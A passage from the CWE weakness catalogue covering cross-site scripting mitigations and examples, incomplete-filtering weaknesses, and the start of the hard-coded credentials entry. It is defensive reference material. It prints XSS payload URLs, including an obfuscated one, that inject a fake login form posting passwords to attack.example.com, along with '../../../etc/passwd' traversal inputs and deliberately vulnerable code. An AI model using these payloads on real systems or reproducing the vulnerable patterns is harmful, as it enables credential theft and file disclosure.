emoticon would not be recorded. This might seem to be a minor inconvenience, but it would be more important in a mathematical forum that wants to represent inequalities. - Even if you make a mistake in your validation (such as forgetting one out of 100 input fields), appropriate encoding is still likely to protect you from injection-based attacks. As long as it is not done in isolation, input validation is still a useful technique, since it may significantly reduce your attack surface, allow you to detect some attacks, and provide other security benefits that proper encoding does not address. - Ensure that you perform input validation at well-defined interfaces within the application. This will help protect the application even if a component is reused or moved elsewhere. - - - - Architecture and Design - Enforcement by Conversion - When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs. - - - Operation - Firewall - Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth. - Moderate - An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization. - - - Operation - Implementation - Environment Hardening - When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues. - - - - - This code displays a welcome message on a web page based on the HTTP GET username parameter. This example covers a Reflected XSS (Type 1) scenario. - - $username = $_GET['username'];echo '<div class="header"> Welcome, ' . $username . '</div>'; - - Because the parameter can be arbitrary, the url of the page could be modified so $username contains scripting syntax, such as - - http://trustedSite.example.com/welcome.php?username=<Script Language="Javascript">alert("You've been attacked!");</Script> - - This results in a harmless alert dialog popping up. Initially this might not appear to be much of a vulnerability. After all, why would someone enter a URL that causes malicious code to run on their own computer? The real danger is that an attacker will create the malicious URL, then use e-mail or social engineering tricks to lure victims into visiting a link to the URL. When victims click the link, they unwittingly reflect the malicious content through the vulnerable web application back to their own computers. - More realistically, the attacker can embed a fake login box on the page, tricking the user into sending the user's password to the attacker: - - http://trustedSite.example.com/welcome.php?username=<div id="stealPassword">Please Login:<form name="input" action="http://attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form></div> - - If a user clicks on this link then Welcome.php will generate the following HTML and send it to the user's browser: - - <div class="header"> Welcome, <div id="stealPassword"> Please Login: - <form name="input" action="attack.example.com/stealPassword.php" method="post">Username: <input type="text" name="username" /><br/>Password: <input type="password" name="password" /><br/><input type="submit" value="Login" /></form> - </div></div> - - The trustworthy domain of the URL may falsely assure the user that it is OK to follow the link. However, an astute user may notice the suspicious text appended to the URL. An attacker may further obfuscate the URL (the following example links are broken into multiple lines for readability): - - trustedSite.example.com/welcome.php?username=%3Cdiv+id%3D%22stealPassword%22%3EPlease+Login%3A%3Cform+name%3D%22input%22+action%3D%22http%3A%2F%2Fattack.example.com%2FstealPassword.php%22+method%3D%22post%22%3EUsername%3A+%3Cinput+type%3D%22text%22+name%3D%22username%22+%2F%3E%3Cbr%2F%3EPassword%3A+%3Cinput+type%3D%22password%22+name%3D%22password%22+%2F%3E%3Cinput+type%3D%22submit%22+value%3D%22Login%22+%2F%3E%3C%2Fform%3E%3C%2Fdiv%3E%0D%0A - - The same attack string could also be obfuscated as: - - trustedSite.example.com/welcome.php?username=<script+type="text/javascript">document.write('\u003C\u0064\u0069\u0076\u0020\u0069\u0064\u003D\u0022\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u003E\u0050\u006C\u0065\u0061\u0073\u0065\u0020\u004C\u006F\u0067\u0069\u006E\u003A\u003C\u0066\u006F\u0072\u006D\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0069\u006E\u0070\u0075\u0074\u0022\u0020\u0061\u0063\u0074\u0069\u006F\u006E\u003D\u0022\u0068\u0074\u0074\u0070\u003A\u002F\u002F\u0061\u0074\u0074\u0061\u0063\u006B\u002E\u0065\u0078\u0061\u006D\u0070\u006C\u0065\u002E\u0063\u006F\u006D\u002F\u0073\u0074\u0065\u0061\u006C\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u002E\u0070\u0068\u0070\u0022\u0020\u006D\u0065\u0074\u0068\u006F\u0064\u003D\u0022\u0070\u006F\u0073\u0074\u0022\u003E\u0055\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0074\u0065\u0078\u0074\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0075\u0073\u0065\u0072\u006E\u0061\u006D\u0065\u0022\u0020\u002F\u003E\u003C\u0062\u0072\u002F\u003E\u0050\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u003A\u0020\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u006E\u0061\u006D\u0065\u003D\u0022\u0070\u0061\u0073\u0073\u0077\u006F\u0072\u0064\u0022\u0020\u002F\u003E\u003C\u0069\u006E\u0070\u0075\u0074\u0020\u0074\u0079\u0070\u0065\u003D\u0022\u0073\u0075\u0062\u006D\u0069\u0074\u0022\u0020\u0076\u0061\u006C\u0075\u0065\u003D\u0022\u004C\u006F\u0067\u0069\u006E\u0022\u0020\u002F\u003E\u003C\u002F\u0066\u006F\u0072\u006D\u003E\u003C\u002F\u0064\u0069\u0076\u003E\u000D');</script> - - Both of these attack links will result in the fake login box appearing on the page, and users are more likely to ignore indecipherable text at the end of URLs. - - - This example also displays a Reflected XSS (Type 1) scenario. - The following JSP code segment reads an employee ID, eid, from an HTTP request and displays it to the user. - - <% String eid = request.getParameter("eid"); %>...Employee ID: <%= eid %> - - The following ASP.NET code segment reads an employee ID number from an HTTP request and displays it to the user. - - <%protected System.Web.UI.WebControls.TextBox Login;protected System.Web.UI.WebControls.Label EmployeeID;...EmployeeID.Text = Login.Text;%> - <p><asp:label id="EmployeeID" runat="server" /></p> - - The code in this example operates correctly if the Employee ID variable contains only standard alphanumeric text. If it has a value that includes meta-characters or source code, then the code will be executed by the web browser as it displays the HTTP response. - - - This example covers a Stored XSS (Type 2) scenario. - The following JSP code segment queries a database for an employee with a given ID and prints the corresponding employee's name. - - <%Statement stmt = conn.createStatement();ResultSet rs = stmt.executeQuery("select * from emp where id="+eid);if (rs != null) {rs.next();String name = rs.getString("name");}%> - Employee Name: <%= name %> - - The following ASP.NET code segment queries a database for an employee with a given employee ID and prints the name corresponding with the ID. - - <%protected System.Web.UI.WebControls.Label EmployeeName;...string query = "select * from emp where id=" + eid;sda = new SqlDataAdapter(query, conn);sda.Fill(dt);string name = dt.Rows[0]["Name"];...EmployeeName.Text = name;%><p><asp:label id="EmployeeName" runat="server" /></p> - - This code can appear less dangerous because the value of name is read from a database, whose contents are apparently managed by the application. However, if the value of name originates from user-supplied data, then the database can be a conduit for malicious content. Without proper input validation on all data stored in the database, an attacker can execute malicious commands in the user's web browser. - - - The following example consists of two separate pages in a web application, one devoted to creating user accounts and another devoted to listing active users currently logged in. It also displays a Stored XSS (Type 2) scenario. - CreateUser.php - - $username = mysql_real_escape_string($username);$fullName = mysql_real_escape_string($fullName);$query = sprintf('Insert Into users (username,password) Values ("%s","%s","%s")', $username, crypt($password),$fullName) ;mysql_query($query);/.../ - - The code is careful to avoid a SQL injection attack (CWE-89) but does not stop valid HTML from being stored in the database. This can be exploited later when ListUsers.php retrieves the information: - ListUsers.php - - $query = 'Select * From users Where loggedIn=true';$results = mysql_query($query); - if (!$results) {exit;} - - //Print list of users to page - echo '<div id="userlist">Currently Active Users:';while ($row = mysql_fetch_assoc($results)) {echo '<div class="userNames">'.$row['fullname'].'</div>';}echo '</div>'; - - The attacker can set their name to be arbitrary HTML, which will then be displayed to all visitors of the Active Users page. This HTML can, for example, be a password stealing Login message. - - - Consider an application that provides a simplistic message board that saves messages in HTML format and appends them to a file. When a new user arrives in the room, it makes an announcement: - - $name = $_COOKIE["myname"];$announceStr = "$name just logged in."; - - //save HTML-formatted message to file; implementation details are irrelevant for this example. - - saveMessage($announceStr); - - An attacker may be able to perform an HTML injection (Type 2 XSS) attack by setting a cookie to a value like: - - <script>document.alert('Hacked');</script> - - The raw contents of the message file would look like: - - <script>document.alert('Hacked');</script> has logged in. - - For each person who visits the message page, their browser would execute the script, generating a pop-up window that says "Hacked". More malicious attacks are possible; see the rest of this entry. - - - - - CVE-2014-8958 - Admin GUI allows XSS through cookie. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8958 - - - CVE-2017-9764 - Web stats program allows XSS through crafted HTTP header. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-9764 - - - CVE-2014-5198 - Web log analysis product allows XSS through crafted HTTP Referer header. - http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5198 - - - CVE-2008-5080 - Chain: protection mechanism failure allows XSS - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5080 - - - CVE-2006-4308 - Chain: incomplete denylist (CWE-184) only checks "javascript:" tag, allowing XSS (CWE-79) using other tags - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4308 - - - CVE-2007-5727 - Chain: incomplete denylist (CWE-184) only removes SCRIPT tags, enabling XSS (CWE-79) - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5727 - - - CVE-2008-5770 - Reflected XSS using the PATH_INFO in a URL - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5770 - - - CVE-2008-4730 - Reflected XSS not properly handled when generating an error message - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4730 - - - CVE-2008-5734 - Reflected XSS sent through email message. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5734 - - - CVE-2008-0971 - Stored XSS in a security product. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0971 - - - CVE-2008-5249 - Stored XSS using a wiki page. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5249 - - - CVE-2006-3568 - Stored XSS in a guestbook application. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3568 - - - CVE-2006-3211 - Stored XSS in a guestbook application using a javascript: URI in a bbcode img tag. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3211 - - - CVE-2006-3295 - Chain: library file is not protected against a direct request (CWE-425), leading to reflected XSS (CWE-79). - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3295 - - - - - Cross-site scripting (XSS) - - - Cross-site Scripting - - - Cross-site scripting - - - A1 - Cross Site Scripting (XSS) - Exact - - - A1 - Unvalidated Input - CWE More Specific - - - A4 - Cross-Site Scripting (XSS) Flaws - Exact - - - 8 - Cross-site Scripting - - - SFP24 - Tainted input to command - - - ASCSM-CWE-79 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - There can be a close relationship between XSS and CSRF (CWE-352). An attacker might use CSRF in order to trick the victim into submitting requests to the server in which the requests contain an XSS payload. A well-known example of this was the Samy worm on MySpace [REF-956]. The worm used XSS to insert malicious HTML sequences into a user's profile and add the attacker as a MySpace friend. MySpace friends of that victim would then execute the payload to modify their own profiles, causing the worm to propagate exponentially. Since the victims did not intentionally insert the malicious script themselves, CSRF was a root cause. - - - XSS flaws are very common in web applications, since they require a great deal of developer discipline to avoid them. - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Description, Relationships, Other_Notes, References, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-01-12 - updated Alternate_Terms, Applicable_Platforms, Background_Details, Common_Consequences, Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2009-03-10 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-05-27 - updated Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Description - - - CWE Content Team - MITRE - 2009-10-29 - updated Observed_Examples, Relationships - - - CWE Content Team - MITRE - 2009-12-28 - updated Demonstrative_Examples, Description, Detection_Factors, Enabling_Factors_for_Exploitation, Observed_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Applicable_Platforms, Detection_Factors, Potential_Mitigations, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2010-04-05 - updated Description, Potential_Mitigations, Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-06-21 - updated Common_Consequences, Description, Name, Potential_Mitigations, References, Relationships - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Demonstrative_Examples, References - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Relationships - - - CWE Content Team - MITRE - 2011-09-13 - updated Detection_Factors, Potential_Mitigations - - - CWE Content Team - MITRE - 2012-05-11 - updated References, Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2013-07-17 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2015-12-07 - updated Relationships - - - CWE Content Team - MITRE - 2017-01-19 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2017-05-03 - updated Related_Attack_Patterns, Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature, Demonstrative_Examples, Enabling_Factors_for_Exploitation, Likelihood_of_Exploit, Modes_of_Introduction, References, Relationships - - - CWE Content Team - MITRE - 2018-03-27 - updated Alternate_Terms, Demonstrative_Examples, Description, Observed_Examples, References, Relationship_Notes, Relationships - - - CWE Content Team - MITRE - 2019-01-03 - updated References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-09-19 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Applicable_Platforms, Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Observed_Examples, Potential_Mitigations - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples, Description - - - CWE Content Team - MITRE - 2021-07-20 - updated Relationships - - Cross-site Scripting (XSS) - Failure to Sanitize Directives in a Web Page (aka 'Cross-site scripting' (XSS)) - Failure to Preserve Web Page Structure (aka 'Cross-site Scripting') - Failure to Preserve Web Page Structure ('Cross-site Scripting') - - - - The software receives data from an upstream component, but does not filter or incorrectly filters special elements before sending it to a downstream component. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Relationships - - - - - The software receives data from an upstream component, but does not completely filter one or more instances of special elements before sending it to a downstream component. - - Incomplete filtering of this nature involves either: - - - only filtering a single instance of a special element when more exist, or - not filtering all instances or all elements where multiple special elements exist. - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives data from an upstream component, but only filters a single instance of a special element before sending it to a downstream component. - Incomplete filtering of this nature may be location-dependent, as in only the first or last element is filtered. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives data from an upstream component, but does not filter all instances of a special element before sending it to a downstream component. - - Incomplete filtering of this nature may be applied to: - - - sequential elements (special elements that appear next to each other) or - non-sequential elements (special elements that appear multiple times in different locations). - - - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter "../" from the input. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression does not have the /g global match modifier, it only removes the first instance of "../" it comes across. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-23). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives data from an upstream component, but only accounts for special elements at a specified location, thereby missing remaining special elements that may exist before sending it to a downstream component. - - A filter might only account for instances of special elements when they occur: - - - relative to a marker (e.g. "at the beginning/end of string; the second argument"), or - at an absolute position (e.g. "byte number 10"). - - - This may leave special elements in the data that did not match the filter position, but still may be dangerous. - - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter a "../" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/^\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression is only looking for an instance of "../" at the beginning of the string, it only removes the first "../" element. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). - - - The following code takes untrusted input and uses a substring function to filter a 3-character "../" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq '../') {$Username = substr($Username, 3);}my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the if function is only looking for a substring of "../" between the 0 and 2 position, it only removes that specific "../" element. So an input value such as: - - ../../../etc/passwd - - will have the first "../" filtered, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2010-06-21 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - - - - The software receives data from an upstream component, but only accounts for special elements positioned relative to a marker (e.g. "at the beginning/end of a string; the second argument"), thereby missing remaining special elements that may exist before sending it to a downstream component. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a regular expression to filter a "../" element located at the beginning of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();$Username =~ s/^\.\.\///;my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the regular expression is only looking for an instance of "../" at the beginning of the string, it only removes the first "../" element. So an input value such as: - - ../../../etc/passwd - - will have the first "../" stripped, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software receives data from an upstream component, but only accounts for special elements at an absolute position (e.g. "byte number 10"), thereby missing remaining special elements that may exist before sending it to a downstream component. - - - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - - - Integrity - Unexpected State - - - - - The following code takes untrusted input and uses a substring function to filter a 3-character "../" element located at the 0-index position of the input string. It then appends this result to the /home/user/ directory and attempts to read the file in the final resulting path. - - my $Username = GetUntrustedInput();if (substr($Username, 0, 3) eq '../') {$Username = substr($Username, 3);}my $filename = "/home/user/" . $Username;ReadAndSendFile($filename); - - Since the if function is only looking for a substring of "../" between the 0 and 2 position, it only removes that specific "../" element. So an input value such as: - - ../../../etc/passwd - - will have the first "../" filtered, resulting in: - - ../../etc/passwd - - This value is then concatenated with the /home/user/ directory: - - /home/user/../../etc/passwd - - which causes the /etc/passwd file to be retrieved once the operating system has resolved the ../ sequences in the pathname. This leads to relative path traversal (CWE-22). - - - - - CWE Content Team - MITRE - 2009-12-04 - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2017-01-19 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - - - - The software contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data. - - Hard-coded credentials typically create a significant hole that allows an attacker to bypass the authentication that has been configured by the software administrator. This hole might be difficult for the system administrator to detect. Even if detected, it can be difficult to fix, so the administrator may be forced into disabling the product entirely. There are two main variations: - - Inbound: the software contains an authentication mechanism that checks the input credentials against a hard-coded set of credentials. - Outbound: the software connects to another system or component, and it contains hard-coded credentials for connecting to that component. - - In the Inbound variant, a default administration account is created, and a simple password is hard-coded into the product and associated with that account. This hard-coded password is the same for each installation of the product, and it usually cannot be changed or disabled by system administrators without manually modifying the program, or otherwise patching the software. If the password is ever discovered or published (a common occurrence on the Internet), then anybody with knowledge of this password can access the product. Finally, since all installations of the software will have the same password, even across different organizations, this enables massive attacks such as worms to take place. - The Outbound variant applies to front-end systems that authenticate with a back-end service. The back-end service may require a fixed password which can be easily discovered. The programmer may simply hard-code those back-end credentials into the front-end software. Any user of that program may be able to extract the password. Client-side systems with hard-coded passwords pose even more of a threat, since the extraction of a password from a binary is usually very simple. - - - - - - - - - - - Primary - - - - - - - - - Architecture and Design - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Access Control - Bypass Protection Mechanism - If hard-coded passwords are used, it is almost certain that malicious users will gain access to the account in question. - - - Integrity - Confidentiality - Availability - Access Control - Other - Read Application Data - Gain Privileges or Assume Identity - Execute Unauthorized Code or Commands - Other - This weakness can lead to the exposure of resources or functionality to unintended actors, possibly providing attackers with sensitive information or even execute arbitrary code. - - - - - Black Box - Credential storage in configuration files is findable using black box methods, but the use of hard-coded credentials for an incoming authentication routine typically involves an account that is not visible outside of the code. - Moderate - - - Automated Static Analysis - Automated white box techniques have been published for detecting hard-coded credentials for incoming authentication, but there is some expert disagreement regarding their effectiveness and applicability to a broad range of methods. - - - Manual Static Analysis - This weakness may be detectable using manual code analysis. Unless authentication is decentralized and applied throughout the software, there can be sufficient time for the analyst to find incoming authentication routines and examine the program logic looking for usage of hard-coded credentials. Configuration files could also be analyzed. - These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. - - - Manual Dynamic Analysis - - For hard-coded credentials in incoming authentication: use monitoring tools that examine the software's process as it interacts with the operating system and the network. This technique is useful in cases when source code is unavailable, if the software was not developed by you, or if you want to verify that the build phase did not introduce any new weaknesses. Examples include debuggers that directly attach to the running process; system-call tracing utilities such as truss (Solaris) and strace (Linux); system activity monitors such as FileMon, RegMon, Process Monitor, and other Sysinternals utilities (Windows); and sniffers and protocol analyzers that monitor network traffic. - Attach the monitor to the process and perform a login. Using call trees or similar artifacts from the output, examine the associated behaviors and see if any of them appear to be comparing the input to a fixed string or value. - - - - Automated Static Analysis - Binary or Bytecode - - According to SOAR, the following detection techniques may be useful: - - Cost effective for partial coverage: - - - Bytecode Weakness Analysis - including disassembler + source code weakness analysis - Binary Weakness Analysis - including disassembler + source code weakness analysis - - - - - SOAR Partial - - - Manual 